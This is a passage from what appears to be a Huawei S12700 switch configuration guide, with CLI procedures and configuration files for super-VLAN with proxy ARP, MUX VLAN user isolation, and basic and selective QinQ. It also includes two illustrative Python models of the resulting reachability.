Super-VLAN is Layer 3 technology configured on a Layer 3 switch, whereas MUX VLAN is
configured on a Layer 2 switch. The super-VLAN is easy to configure. The MUX VLAN
configuration is complex, but its access control is more flexible than super-VLAN. When the
switch queries temporarily offline users in the super-VLAN, the gateway needs to broadcast
packets in each sub-VLAN, consuming many CPU resources.

Configuration Notes
l VLAN 1 cannot be configured as a super-VLAN.
l No physical interface can be added to a VLAN configured as a super-VLAN.
l This example applies to all versions of the S12700.


Networking Requirements
As shown in Figure 6-16, a company has many departments on the same network segment.
To improve service security, the company assigns different departments to different VLANs.
VLAN 2 and VLAN 3 belong to different departments. Each department wants to access the
Internet, and PCs in different departments need to communicate to meet service requirements.

Figure 6-16 Networking of the super-VLAN
[Figure: Internet behind Router; Router connects to SwitchB GE1/0/1 in VLAN 10; SwitchB (Super-VLAN 4) GE1/0/5 connects to SwitchA GE1/0/5; SwitchA GE1/0/1 and GE1/0/2 serve VLAN 2, GE1/0/3 and GE1/0/4 serve VLAN 3]

Configuration Roadmap
Configure VLAN aggregation on SwitchB to add VLANs of different departments to a super-
VLAN so that PCs in different departments can access the Internet using the super-VLAN.
Deploy proxy ARP in the super-VLAN so that PCs in different departments can
communicate. The configuration roadmap is as follows:
1. Configure VLANs and interfaces on SwitchA and SwitchB, add PCs of different
departments to different VLANs, and configure interfaces on SwitchA and SwitchB to
transparently transmit packets from VLANs.
2. Configure a super-VLAN, a VLANIF interface, and a static route on SwitchB so that
PCs in different departments can access the Internet.
3. Configure proxy ARP in the super-VLAN on SwitchB so that PCs in different
departments can communicate at Layer 3.

Procedure
Step 1 Configure SwitchA.
# Add GE1/0/1, GE1/0/2, GE1/0/3, and GE1/0/4 to VLANs.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] vlan batch 2 to 3
[SwitchA] interface gigabitethernet 1/0/1
[SwitchA-GigabitEthernet1/0/1] port link-type access //Configure the link type of the interface as access.
[SwitchA-GigabitEthernet1/0/1] port default vlan 2 //Add the interface to VLAN 2.
[SwitchA-GigabitEthernet1/0/1] quit
[SwitchA] interface gigabitethernet 1/0/2
[SwitchA-GigabitEthernet1/0/2] port link-type access
[SwitchA-GigabitEthernet1/0/2] port default vlan 2
[SwitchA-GigabitEthernet1/0/2] quit
[SwitchA] interface gigabitethernet 1/0/3
[SwitchA-GigabitEthernet1/0/3] port link-type access
[SwitchA-GigabitEthernet1/0/3] port default vlan 3 //Add the interface to VLAN 3.
[SwitchA-GigabitEthernet1/0/3] quit
[SwitchA] interface gigabitethernet 1/0/4
[SwitchA-GigabitEthernet1/0/4] port link-type access
[SwitchA-GigabitEthernet1/0/4] port default vlan 3
[SwitchA-GigabitEthernet1/0/4] quit

# Configure GE1/0/5 to transparently transmit packets from VLAN 2 and VLAN 3.


[SwitchA] interface gigabitethernet 1/0/5
[SwitchA-GigabitEthernet1/0/5] port link-type trunk
[SwitchA-GigabitEthernet1/0/5] port trunk allow-pass vlan 2 to 3
[SwitchA-GigabitEthernet1/0/5] quit

Step 2 Configure SwitchB.


# Create VLAN 2, VLAN 3, VLAN 4, and VLAN 10 and configure the interface of SwitchB
connected to SwitchA to transparently transmit packets from VLAN 2 and VLAN 3 to
SwitchB.
<HUAWEI> system-view
[HUAWEI] sysname SwitchB
[SwitchB] vlan batch 2 3 4 10
[SwitchB] interface gigabitethernet 1/0/5
[SwitchB-GigabitEthernet1/0/5] port link-type trunk
[SwitchB-GigabitEthernet1/0/5] port trunk allow-pass vlan 2 3
[SwitchB-GigabitEthernet1/0/5] quit

# Configure super-VLAN 4 on SwitchB and add VLAN 2 and VLAN 3 to super-VLAN 4 as sub-VLANs.
[SwitchB] vlan 4
[SwitchB-vlan4] aggregate-vlan
[SwitchB-vlan4] access-vlan 2 to 3
[SwitchB-vlan4] quit

# Create and configure VLANIF 4 so that PCs in different departments can access the Internet
using super-VLAN 4.
[SwitchB] interface vlanif 4
[SwitchB-Vlanif4] ip address 10.1.1.1 24
[SwitchB-Vlanif4] quit

# Configure the uplink interface GE1/0/1 to transparently transmit packets from the VLAN
that SwitchB and router belong to.
[SwitchB] interface gigabitethernet 1/0/1
[SwitchB-GigabitEthernet1/0/1] port link-type trunk
[SwitchB-GigabitEthernet1/0/1] port trunk allow-pass vlan 10
[SwitchB-GigabitEthernet1/0/1] quit

# Create and configure VLANIF 10 and specify the IP address of VLANIF 10 as the IP
address for connecting SwitchB and the router.
[SwitchB] interface vlanif 10
[SwitchB-Vlanif10] ip address 10.10.1.1 24
[SwitchB-Vlanif10] quit

# Configure a static route to the router on SwitchB so that users can access the Internet.


[SwitchB] ip route-static 0.0.0.0 0.0.0.0 10.10.1.2

NOTE

Configure the router interface connected to SwitchB and assign the IP address of 10.10.1.2 to the router
interface. See the router configuration manual.

Step 3 Assign IP addresses to PCs.


Configure IP addresses for PCs and ensure that their IP addresses are on the same network
segment as 10.1.1.1/24 (IP address of VLANIF 4).
After the configuration is complete, PCs in each department can access the Internet, but PCs
in VLAN 2 and VLAN 3 cannot ping each other.
Step 4 Configure proxy ARP.
# Configure proxy ARP in super-VLAN 4 on SwitchB so that users in different departments
can communicate at Layer 3.
[SwitchB] interface vlanif 4
[SwitchB-Vlanif4] arp-proxy inter-sub-vlan-proxy enable
[SwitchB-Vlanif4] quit

Step 5 Verify the configuration.


After the configuration is complete, users in VLAN 2 and VLAN 3 can ping each other and
access the Internet.

----End
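The Step 3 and Step 5 observations as a small forwarding model, added here as an illustration and not S12700 code: an ARP broadcast stays inside one sub-VLAN, the VLANIF answers for the gateway address in every sub-VLAN, and inter-sub-VLAN proxy ARP lets the gateway answer on behalf of a host in another sub-VLAN, which is exactly the inter-department isolation that Step 4 gives up on purpose. Host names, IP addresses and MAC addresses are constructed.

```python
"""Model of super-VLAN (VLAN aggregation) forwarding on SwitchB above:
super-VLAN 4 with sub-VLANs 2 and 3 and VLANIF 4 at 10.1.1.1/24, with and
without inter-sub-VLAN proxy ARP. Added illustration, not S12700 code;
host IP and MAC addresses are constructed."""
import ipaddress
from dataclasses import dataclass

GATEWAY_MAC = "00:00:5e:00:01:04"   # constructed MAC for VLANIF 4


@dataclass(frozen=True)
class Host:
    name: str
    vlan: int   # sub-VLAN of the access port (VLAN 2 or 3 here)
    ip: str
    mac: str


@dataclass(frozen=True)
class SuperVlan:
    vlan_id: int
    sub_vlans: frozenset
    gateway_ip: str
    network: str                        # prefix configured on the VLANIF
    inter_sub_vlan_proxy: bool = False  # arp-proxy inter-sub-vlan-proxy enable

    def contains(self, ip: str) -> bool:
        return ipaddress.ip_address(ip) in ipaddress.ip_network(self.network)


def arp_resolve(src: Host, target_ip: str, hosts, sv: SuperVlan):
    """MAC returned for an ARP request from src, or None if nobody answers.
    The broadcast is confined to src's sub-VLAN, so only a host in the same
    sub-VLAN, or the gateway (which is present in every sub-VLAN), replies."""
    if target_ip == sv.gateway_ip:
        return GATEWAY_MAC
    for h in hosts:
        if h.vlan == src.vlan and h.ip == target_ip:
            return h.mac
    if sv.inter_sub_vlan_proxy and sv.contains(target_ip):
        # proxy ARP: the gateway answers with its own MAC when the target
        # exists in another sub-VLAN of the same super-VLAN
        if any(h.ip == target_ip and h.vlan in sv.sub_vlans for h in hosts):
            return GATEWAY_MAC
    return None


def can_ping(src: Host, dst: Host, hosts, sv: SuperVlan) -> bool:
    """src and dst share the VLANIF's /24, so src ARPs for dst directly
    instead of sending the packet to its default gateway."""
    mac = arp_resolve(src, dst.ip, hosts, sv)
    if mac is None:
        return False
    if mac == GATEWAY_MAC:
        # the gateway routes the packet and ARPs inside dst's own sub-VLAN
        return dst.vlan in sv.sub_vlans
    return True


def can_reach_internet(src: Host, hosts, sv: SuperVlan) -> bool:
    """Off-subnet traffic only needs the default gateway's MAC, which the
    VLANIF answers in every sub-VLAN; proxy ARP plays no role here."""
    return arp_resolve(src, sv.gateway_ip, hosts, sv) == GATEWAY_MAC


def build_topology(proxy_arp: bool):
    """Two PCs in VLAN 2 and one in VLAN 3, as on SwitchA's access ports."""
    hosts = (
        Host("PC1", 2, "10.1.1.11", "02:00:00:00:00:11"),
        Host("PC2", 2, "10.1.1.12", "02:00:00:00:00:12"),
        Host("PC3", 3, "10.1.1.13", "02:00:00:00:00:13"),
    )
    sv = SuperVlan(4, frozenset({2, 3}), "10.1.1.1", "10.1.1.0/24", proxy_arp)
    return hosts, sv


def reachability(proxy_arp: bool) -> dict:
    """Summarise the Step 3 (proxy off) and Step 5 (proxy on) observations."""
    hosts, sv = build_topology(proxy_arp)
    pc1, pc2, pc3 = hosts
    return {
        "internet": can_reach_internet(pc1, hosts, sv),
        "vlan2_to_vlan2": can_ping(pc1, pc2, hosts, sv),
        "vlan2_to_vlan3": can_ping(pc1, pc3, hosts, sv),
    }
```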

Configuration Files
Configuration file of SwitchA
#
sysname SwitchA
#
vlan batch 2 to 3
#
interface GigabitEthernet1/0/1
port link-type access
port default vlan 2
#
interface GigabitEthernet1/0/2
port link-type access
port default vlan 2
#
interface GigabitEthernet1/0/3
port link-type access
port default vlan 3
#
interface GigabitEthernet1/0/4
port link-type access
port default vlan 3
#
interface GigabitEthernet1/0/5
port link-type trunk
port trunk allow-pass vlan 2 to 3
#
return

Configuration file of SwitchB


#
sysname SwitchB
#


vlan batch 2 to 4 10
#
vlan 4
aggregate-vlan
access-vlan 2 to 3
#
interface Vlanif4
ip address 10.1.1.1 255.255.255.0
arp-proxy inter-sub-vlan-proxy enable
#
interface Vlanif10
ip address 10.10.1.1 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 10
#
interface GigabitEthernet1/0/5
port link-type trunk
port trunk allow-pass vlan 2 to 3
#
ip route-static 0.0.0.0 0.0.0.0 10.10.1.2
#
return

6.3.10 Example for Configuring MUX VLAN to Isolate Users in the Same VLAN

MUX VLAN Overview


Multiplex VLAN (MUX VLAN) provides a mechanism to control network resources using
VLANs. It can implement inter-VLAN communication and intra-VLAN isolation. The MUX
VLAN often applies to hotels and residential buildings requiring broadband access, and
enterprises. A hotel, residential building, or enterprise shares the same VLAN, but each room,
household, or department is isolated.

MUX VLAN is configured on a Layer 2 switch, whereas super-VLAN technology is configured on a Layer 3 switch. MUX VLAN is more flexible in access control, but its configuration is complex.

Configuration Notes
l The VLAN ID assigned to a principal VLAN cannot be used to configure VLAN
mapping, VLAN stacking, super-VLAN, or sub-VLAN.
l The VLAN ID assigned to a group or separate VLAN cannot be used to configure any
VLANIF interface, VLAN mapping, VLAN stacking, super-VLAN, or sub-VLAN.
l Disabling MAC address learning or limiting the number of learned MAC addresses on
an interface affects the MUX VLAN function on the interface.
l MUX VLAN and port security cannot be configured on the same interface
simultaneously.
l MUX VLAN and MAC address authentication cannot be configured on the same
interface simultaneously.
l MUX VLAN and 802.1x authentication cannot be configured on the same interface
simultaneously.
l If the MUX VLAN function is enabled on an interface, VLAN mapping and VLAN
stacking cannot be configured on the interface.


l This example applies to all versions of the S12700.

Networking Requirements
All employees of an enterprise can access servers on the enterprise network. The enterprise
allows some employees to communicate but expects to isolate some employees.

As shown in Figure 6-17, Switch1 is deployed at the aggregation layer and used as the
gateway for downstream hosts. Switch2, Switch3, Switch4, Switch5, and Switch6 are access
switches. Their GE1/0/1 interfaces connect to downstream hosts, and their GE1/0/2 interfaces
connect to Switch1. You can configure MUX VLAN on Switch1. This reduces the number of
VLAN IDs on the enterprise network and facilitates network management.

Figure 6-17 Networking of MUX VLAN
(Figure not reproduced. Labels: Internet; Switch1; Server behind Switch2 on GE1/0/2, VLAN 2 (Principal VLAN); GE1/0/3 and GE1/0/4 to Switch3 and Switch4 with HostB and HostC, VLAN 3 (Group VLAN); GE1/0/5 and GE1/0/6 to Switch5 and Switch6 with HostD and HostE, VLAN 4 (Separate VLAN).)

Configuration Roadmap
The configuration roadmap is as follows:

1. Configure the principal VLAN and a VLANIF interface. The IP address of the VLANIF
interface is used as the gateway IP address for downstream hosts and servers.
2. Configure the group VLAN.
3. Configure the separate VLAN.
4. Add interfaces to VLANs and enable the MUX VLAN function on the interfaces.
5. Add interfaces of access switches to VLANs.

Procedure
Step 1 Enable the MUX VLAN function on Switch1.


# On Switch1, create VLAN 2, VLAN 3, and VLAN 4, and a VLANIF interface for VLAN 2.
The IP address of the VLANIF interface is used as the gateway IP address for downstream
hosts and servers.
<HUAWEI> system-view
[HUAWEI] sysname Switch1
[Switch1] vlan batch 2 3 4
[Switch1] interface vlanif 2
[Switch1-Vlanif2] ip address 192.168.100.100 24
[Switch1-Vlanif2] quit

# Configure the group VLAN and separate VLAN of the MUX VLAN on Switch1.
[Switch1] vlan 2
[Switch1-vlan2] mux-vlan
[Switch1-vlan2] subordinate group 3 //Configure VLAN 3 as the group VLAN.
[Switch1-vlan2] subordinate separate 4 //Configure VLAN 4 as the separate VLAN.
[Switch1-vlan2] quit

# Add interfaces to the VLANs on Switch1 and enable the MUX VLAN function on
interfaces.
[Switch1] interface gigabitethernet 1/0/2
[Switch1-GigabitEthernet1/0/2] port link-type trunk
[Switch1-GigabitEthernet1/0/2] port trunk allow-pass vlan 2
[Switch1-GigabitEthernet1/0/2] port mux-vlan enable vlan 2
[Switch1-GigabitEthernet1/0/2] quit
[Switch1] interface gigabitethernet 1/0/3
[Switch1-GigabitEthernet1/0/3] port link-type trunk
[Switch1-GigabitEthernet1/0/3] port trunk allow-pass vlan 3
[Switch1-GigabitEthernet1/0/3] port mux-vlan enable vlan 3
[Switch1-GigabitEthernet1/0/3] quit
[Switch1] interface gigabitethernet 1/0/4
[Switch1-GigabitEthernet1/0/4] port link-type trunk
[Switch1-GigabitEthernet1/0/4] port trunk allow-pass vlan 3
[Switch1-GigabitEthernet1/0/4] port mux-vlan enable vlan 3
[Switch1-GigabitEthernet1/0/4] quit
[Switch1] interface gigabitethernet 1/0/5
[Switch1-GigabitEthernet1/0/5] port link-type trunk
[Switch1-GigabitEthernet1/0/5] port trunk allow-pass vlan 4
[Switch1-GigabitEthernet1/0/5] port mux-vlan enable vlan 4
[Switch1-GigabitEthernet1/0/5] quit
[Switch1] interface gigabitethernet 1/0/6
[Switch1-GigabitEthernet1/0/6] port link-type trunk
[Switch1-GigabitEthernet1/0/6] port trunk allow-pass vlan 4
[Switch1-GigabitEthernet1/0/6] port mux-vlan enable vlan 4
[Switch1-GigabitEthernet1/0/6] quit

Step 2 Configure interfaces of access switches and add them to VLANs. The configurations of
Switch3, Switch4, Switch5, and Switch6 are similar to the configuration of Switch2, and are
not mentioned here.
<HUAWEI> system-view
[HUAWEI] sysname Switch2
[Switch2] vlan batch 2
[Switch2] interface gigabitethernet 1/0/1
[Switch2-GigabitEthernet1/0/1] port link-type access //Configure the link type of the interface as access.
[Switch2-GigabitEthernet1/0/1] port default vlan 2
[Switch2-GigabitEthernet1/0/1] quit
[Switch2] interface gigabitethernet 1/0/2
[Switch2-GigabitEthernet1/0/2] port link-type trunk //Configure the link type of the interface as trunk.
[Switch2-GigabitEthernet1/0/2] port trunk allow-pass vlan 2
[Switch2-GigabitEthernet1/0/2] quit

Step 3 Verify the configuration.


The server can communicate with HostB, HostC, HostD, and HostE.
HostB can communicate with HostC.
HostD cannot communicate with HostE.
HostB and HostC cannot communicate with either HostD or HostE.

----End
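The MUX VLAN forwarding rules of this example written out as a reachability table, added here as an illustration and not S12700 code. It reproduces the Step 3 results for the principal VLAN 2 (server), group VLAN 3 (HostB, HostC) and separate VLAN 4 (HostD, HostE) and adds a check that lists pairs which should be isolated but are reachable, which is the thing to verify before a host is moved between the group and separate VLANs; the rule that two different subordinate VLANs are isolated from each other is the model's assumption, since the page shows only one of each.

```python
"""Reachability model for the MUX VLAN above: principal VLAN 2 (server),
group VLAN 3 (HostB, HostC) and separate VLAN 4 (HostD, HostE). Added
illustration, not S12700 code; it encodes the MUX VLAN forwarding rules so
the Step 3 results can be checked as a table before a change is pushed."""
from dataclasses import dataclass
from itertools import combinations


@dataclass(frozen=True)
class MuxVlan:
    principal: int
    group: frozenset      # subordinate group VLANs
    separate: frozenset   # subordinate separate VLANs

    def __post_init__(self):
        # Model assumption: one VLAN ID cannot hold two MUX VLAN roles
        roles = [frozenset({self.principal}), self.group, self.separate]
        for a, b in combinations(roles, 2):
            if a & b:
                raise ValueError("VLAN ID in two roles: %s" % sorted(a & b))

    @property
    def members(self) -> frozenset:
        return frozenset({self.principal}) | self.group | self.separate


def can_communicate(mux: MuxVlan, src_vlan: int, dst_vlan: int) -> bool:
    """Forwarding rules of the MUX VLAN:
    - the principal VLAN reaches every subordinate VLAN and vice versa;
    - hosts in the same group VLAN reach each other;
    - hosts in a separate VLAN reach only the principal VLAN, not each other;
    - two different subordinate VLANs are isolated from each other (this
      case does not occur on the page; it is the model's assumption)."""
    if src_vlan not in mux.members or dst_vlan not in mux.members:
        return False
    if mux.principal in (src_vlan, dst_vlan):
        return True
    if src_vlan == dst_vlan:
        return src_vlan in mux.group
    return False


@dataclass(frozen=True)
class Host:
    name: str
    vlan: int   # VLAN of the access port on its access switch


HOSTS = (Host("Server", 2), Host("HostB", 3), Host("HostC", 3),
         Host("HostD", 4), Host("HostE", 4))
MUX = MuxVlan(principal=2, group=frozenset({3}), separate=frozenset({4}))


def reachability(hosts=HOSTS, mux: MuxVlan = MUX) -> dict:
    """(src name, dst name) -> bool for every ordered pair of distinct hosts."""
    return {(a.name, b.name): can_communicate(mux, a.vlan, b.vlan)
            for a in hosts for b in hosts if a is not b}


def isolation_violations(expected_isolated, table=None) -> list:
    """Pairs that are expected to be isolated but are reachable in the model.
    Running this against a proposed layout catches a host that was put in
    the group VLAN when it should have been in the separate VLAN."""
    table = reachability() if table is None else table
    return sorted(pair for pair in expected_isolated if table.get(pair, False))
```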

Configuration Files
Configuration file of Switch1

#
sysname Switch1
#
vlan batch 2 to 4
#
vlan 2
mux-vlan
subordinate separate 4
subordinate group 3
#
interface Vlanif2
ip address 192.168.100.100 255.255.255.0
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 2
port mux-vlan enable vlan 2
#
interface GigabitEthernet1/0/3
port link-type trunk
port trunk allow-pass vlan 3
port mux-vlan enable vlan 3
#
interface GigabitEthernet1/0/4
port link-type trunk
port trunk allow-pass vlan 3
port mux-vlan enable vlan 3
#
interface GigabitEthernet1/0/5
port link-type trunk
port trunk allow-pass vlan 4
port mux-vlan enable vlan 4
#
interface GigabitEthernet1/0/6
port link-type trunk
port trunk allow-pass vlan 4
port mux-vlan enable vlan 4
#
return

Configuration file of Switch2

#
sysname Switch2
#
vlan batch 2
#
interface GigabitEthernet1/0/1
port link-type access
port default vlan 2
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 2


#
return

Configuration file of Switch3

#
sysname Switch3
#
vlan batch 3
#
interface GigabitEthernet1/0/1
port link-type access
port default vlan 3
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 3
#
return

Configuration file of Switch4

#
sysname Switch4
#
vlan batch 3
#
interface GigabitEthernet1/0/1
port link-type access
port default vlan 3
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 3
#
return

Configuration file of Switch5

#
sysname Switch5
#
vlan batch 4
#
interface GigabitEthernet1/0/1
port link-type access
port default vlan 4
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 4
#
return

Configuration file of Switch6

#
sysname Switch6
#
vlan batch 4
#
interface GigabitEthernet1/0/1
port link-type access
port default vlan 4
#
interface GigabitEthernet1/0/2

port link-type trunk
port trunk allow-pass vlan 4
#
return

6.4 Typical QinQ Configuration


6.4.1 Example for Configuring Basic QinQ
QinQ Overview
802.1Q-in-802.1Q (QinQ) expands VLAN space by adding an additional 802.1Q tag to
802.1Q tagged packets. It allows services in a private VLAN to be transparently transmitted
over a public network.
Basic QinQ, also called QinQ tunneling, is performed on interfaces. When an interface enabled with basic QinQ receives a packet, the device adds the default VLAN tag of that interface to the packet as the outer tag. If the received packet is already tagged, it then carries two VLAN tags; if the received packet is untagged, it carries only the default VLAN tag of the interface.
When too many VLANs are required, you can configure basic QinQ. Basic QinQ, by adding
an outer tag, expands VLAN space and solves the VLAN shortage problem.

Configuration Notes
This example applies to all versions of the S12700.

Networking Requirements
As shown in Figure 6-18, a network has two enterprises: enterprise 1 and enterprise 2. Both
enterprises have two branches. Enterprise 1 and enterprise 2 networks connect to SwitchA and
SwitchB, respectively, of the ISP network. In addition, there are non-Huawei devices on the
public network and the TPID in the outer VLAN tag is 0x9100.
The requirements are as follows:
l VLANs need to be independently assigned to enterprise 1 and enterprise 2.
l Traffic between the two branches of each enterprise is transparently transmitted through
the public network. Users accessing the same service in different branches of each
enterprise are allowed to communicate, and users accessing different services must be
isolated.
QinQ can be used to meet the preceding requirements. Configure VLAN 100 and VLAN 200
to implement connectivity of enterprise 1 and enterprise 2 respectively and to isolate
enterprise 1 and enterprise 2; configure the TPID in the outer VLAN tag on switch interfaces
connected to non-Huawei devices so that Huawei switches can communicate with the non-
Huawei devices.


Figure 6-18 Networking of basic QinQ
(Figure not reproduced. Labels: ISP network carrying VLAN 100 and VLAN 200 with TPID=0x9100; SwitchA and SwitchB each connected to the ISP network through GE1/0/3; on each switch, GE1/0/1 connects enterprise 1 (VLAN 10 to 50) and GE1/0/2 connects enterprise 2 (VLAN 20 to 60).)

Configuration Roadmap
The configuration roadmap is as follows:

1. Create VLAN 100 and VLAN 200 on SwitchA and SwitchB, configure connected
interfaces as QinQ interfaces, and add the interfaces to VLANs so that different VLAN
tags are added to packets of different services.
2. Add interfaces of SwitchA and SwitchB that are connected to the public network to
VLANs so that packets from VLAN 100 and VLAN 200 are allowed to pass through.
3. Configure the TPID in the outer VLAN tag on interfaces of SwitchA and SwitchB that
are connected to the public network so that SwitchA and SwitchB can communicate with
non-Huawei devices.

Procedure
Step 1 Create VLANs.

# Create VLAN 100 and VLAN 200 on SwitchA.


<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] vlan batch 100 200

# Create VLAN 100 and VLAN 200 on SwitchB.


<HUAWEI> system-view
[HUAWEI] sysname SwitchB
[SwitchB] vlan batch 100 200

Step 2 Set the link type of interfaces to QinQ.

# Configure GE1/0/1 and GE1/0/2 of SwitchA as QinQ interfaces, and set the default VLAN of GE1/0/1 to VLAN 100 and the default VLAN of GE1/0/2 to VLAN 200. VLAN 100 and VLAN 200 are added to outer tags. The configuration of SwitchB is similar to the configuration of SwitchA, and is not mentioned here.
[SwitchA] interface gigabitethernet 1/0/1
[SwitchA-GigabitEthernet1/0/1] port link-type dot1q-tunnel //Configure the link type of the interface as QinQ.
[SwitchA-GigabitEthernet1/0/1] port default vlan 100
[SwitchA-GigabitEthernet1/0/1] quit
[SwitchA] interface gigabitethernet 1/0/2
[SwitchA-GigabitEthernet1/0/2] port link-type dot1q-tunnel //Configure the link type of the interface as QinQ.
[SwitchA-GigabitEthernet1/0/2] port default vlan 200
[SwitchA-GigabitEthernet1/0/2] quit

Step 3 Configure switch interfaces connected to the public network.


# Add GE1/0/3 on SwitchA to VLAN 100 and VLAN 200. The configuration of SwitchB is similar to the configuration of SwitchA, and is not mentioned here.
[SwitchA] interface gigabitethernet 1/0/3
[SwitchA-GigabitEthernet1/0/3] port link-type trunk
[SwitchA-GigabitEthernet1/0/3] port trunk allow-pass vlan 100 200
[SwitchA-GigabitEthernet1/0/3] quit

Step 4 Configure the TPID in the outer VLAN tag.


# Set the TPID in the outer VLAN tag to 0x9100 on SwitchA.
[SwitchA] interface gigabitethernet 1/0/3
[SwitchA-GigabitEthernet1/0/3] qinq protocol 9100 //Set the TPID in the outer VLAN tag to 0x9100.

# Set the TPID in the outer VLAN tag to 0x9100 on SwitchB.


[SwitchB] interface gigabitethernet 1/0/3
[SwitchB-GigabitEthernet1/0/3] qinq protocol 9100 //Set the TPID in the outer VLAN tag to 0x9100.

Step 5 Verify the configuration.


On a PC in a VLAN of a branch in enterprise 1, ping a PC in the same VLAN of the other
branch in enterprise 1. The ping operation succeeds, indicating that branches of enterprise 1
can communicate with each other.
On a PC in a VLAN of a branch in enterprise 2, ping a PC in the same VLAN of the other
branch in enterprise 2. The ping operation succeeds, indicating that branches of enterprise 2
can communicate with each other.
On a PC in a VLAN of a branch in enterprise 1, ping a PC in the same VLAN of a branch in
enterprise 2. The ping operation fails, indicating that enterprise 1 and enterprise 2 are isolated.

----End

Configuration Files
l Configuration file of SwitchA
#
sysname SwitchA
#
vlan batch 100 200
#
interface GigabitEthernet1/0/1
port link-type dot1q-tunnel
port default vlan 100
#


interface GigabitEthernet1/0/2
port link-type dot1q-tunnel
port default vlan 200
#
interface GigabitEthernet1/0/3
qinq protocol 9100
port link-type trunk
port trunk allow-pass vlan 100 200
#
return

l Configuration file of SwitchB


#
sysname SwitchB
#
vlan batch 100 200
#
interface GigabitEthernet1/0/1
port link-type dot1q-tunnel
port default vlan 100
#
interface GigabitEthernet1/0/2
port link-type dot1q-tunnel
port default vlan 200
#
interface GigabitEthernet1/0/3
qinq protocol 9100
port link-type trunk
port trunk allow-pass vlan 100 200
#
return

Related Content
Videos

Configuring QinQ

6.4.2 Example for Configuring VLAN ID-based Selective QinQ

QinQ Overview
802.1Q-in-802.1Q (QinQ) expands VLAN space by adding an additional 802.1Q tag to
802.1Q tagged packets. It allows services in a private VLAN to be transparently transmitted
over a public network.

Selective QinQ, also called VLAN stacking or QinQ stacking, is an extension of QinQ.
Selective QinQ is performed based on interfaces and VLAN IDs. In addition to functions of
basic QinQ, selective QinQ takes different actions for packets received by the same interface
based on VLANs.

VLAN ID-based selective QinQ adds different outer VLAN tags to packets with different
inner VLAN IDs.

Configuration Notes
When configuring selective QinQ on the switch, pay attention to the following points:

l Before configuring selective QinQ on a fixed switch, you must run the qinq vlan-translation enable command to enable VLAN translation.


l Selective QinQ can only be enabled on hybrid interfaces in the inbound direction.
l The outer VLAN must be created before Selective QinQ is performed.
l When an interface configured with VLAN stacking needs to remove the outer tag from
outgoing frames, the interface must join the VLAN specified by stack-vlan in untagged
mode. If the outer VLAN does not need to be removed, the interface must join the
VLAN specified by stack-vlan in tagged mode.
l The device configured with selective QinQ can add only one outer VLAN tag to a frame
with an inner VLAN tag on an interface.
l If only single-tagged packets from a VLAN need to be transparently transmitted, do not
specify the VLAN as the inner VLAN of selective QinQ.
l This example applies to all versions of the S12700.

Networking Requirements
As shown in Figure 6-19, Internet access users (using PCs) and VoIP users (using VoIP
phones) connect to the ISP network through SwitchA and SwitchB and communicate with
each other through the ISP network.

In the enterprise, VLAN 100 is allocated to PCs and VLAN 300 is allocated to VoIP phones.

It is required that packets of PCs and VoIP phones are tagged VLAN 2 and VLAN 3
respectively when the packets are transmitted through the ISP network.

Figure 6-19 Networking of VLAN ID-based selective QinQ
(Figure not reproduced. Labels: SwitchA and SwitchB connected through their GE1/0/2 interfaces across the carrier network; a PC and a VoIP phone attached to GE1/0/1 on each switch.)

Configuration Roadmap
The configuration roadmap is as follows:

1. Create VLANs on SwitchA and SwitchB.
2. Configure link types of interfaces and add interfaces to VLANs on SwitchA and SwitchB.
3. Configure selective QinQ on interfaces of SwitchA and SwitchB.


Procedure
Step 1 Create VLANs.

# On SwitchA, create VLAN 2 and VLAN 3, that is, VLAN IDs of the outer VLAN tag to be
added.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] vlan batch 2 3

# On SwitchB, create VLAN 2 and VLAN 3, that is, VLAN IDs of the outer VLAN tag to be
added.
<HUAWEI> system-view
[HUAWEI] sysname SwitchB
[SwitchB] vlan batch 2 3

Step 2 Configure selective QinQ on interfaces.

# Configure GE1/0/1 on SwitchA.


[SwitchA] interface gigabitethernet 1/0/1
[SwitchA-GigabitEthernet1/0/1] port link-type hybrid
[SwitchA-GigabitEthernet1/0/1] port hybrid untagged vlan 2 3 //Add the hybrid interface to VLANs in untagged mode.
[SwitchA-GigabitEthernet1/0/1] port vlan-stacking vlan 100 stack-vlan 2 //Configure the inner VLAN tag as VLAN 100 and add VLAN 2 in the outer VLAN tag.
[SwitchA-GigabitEthernet1/0/1] port vlan-stacking vlan 300 stack-vlan 3 //Configure the inner VLAN tag as VLAN 300 and add VLAN 3 in the outer VLAN tag.
[SwitchA-GigabitEthernet1/0/1] quit

# Configure GE1/0/1 on SwitchB.


[SwitchB] interface gigabitethernet 1/0/1
[SwitchB-GigabitEthernet1/0/1] port link-type hybrid
[SwitchB-GigabitEthernet1/0/1] port hybrid untagged vlan 2 3 //Add the hybrid interface to VLANs in untagged mode.
[SwitchB-GigabitEthernet1/0/1] port vlan-stacking vlan 100 stack-vlan 2 //Configure the inner VLAN tag as VLAN 100 and add VLAN 2 in the outer VLAN tag.
[SwitchB-GigabitEthernet1/0/1] port vlan-stacking vlan 300 stack-vlan 3 //Configure the inner VLAN tag as VLAN 300 and add VLAN 3 in the outer VLAN tag.
[SwitchB-GigabitEthernet1/0/1] quit

Step 3 Configure other interfaces.

# Add GE1/0/2 on SwitchA to VLAN 2 and VLAN 3.


[SwitchA] interface gigabitethernet 1/0/2
[SwitchA-GigabitEthernet1/0/2] port link-type trunk
[SwitchA-GigabitEthernet1/0/2] port trunk allow-pass vlan 2 3
[SwitchA-GigabitEthernet1/0/2] quit

# Add GE1/0/2 on SwitchB to VLAN 2 and VLAN 3.


[SwitchB] interface gigabitethernet 1/0/2
[SwitchB-GigabitEthernet1/0/2] port link-type trunk
[SwitchB-GigabitEthernet1/0/2] port trunk allow-pass vlan 2 3
[SwitchB-GigabitEthernet1/0/2] quit

Step 4 Verify the configuration.

If the configurations on SwitchA and SwitchB are correct, you can obtain the following
information:

l PCs can communicate with each other through the ISP network.
l VoIP phones can communicate with each other through the ISP network.

----End
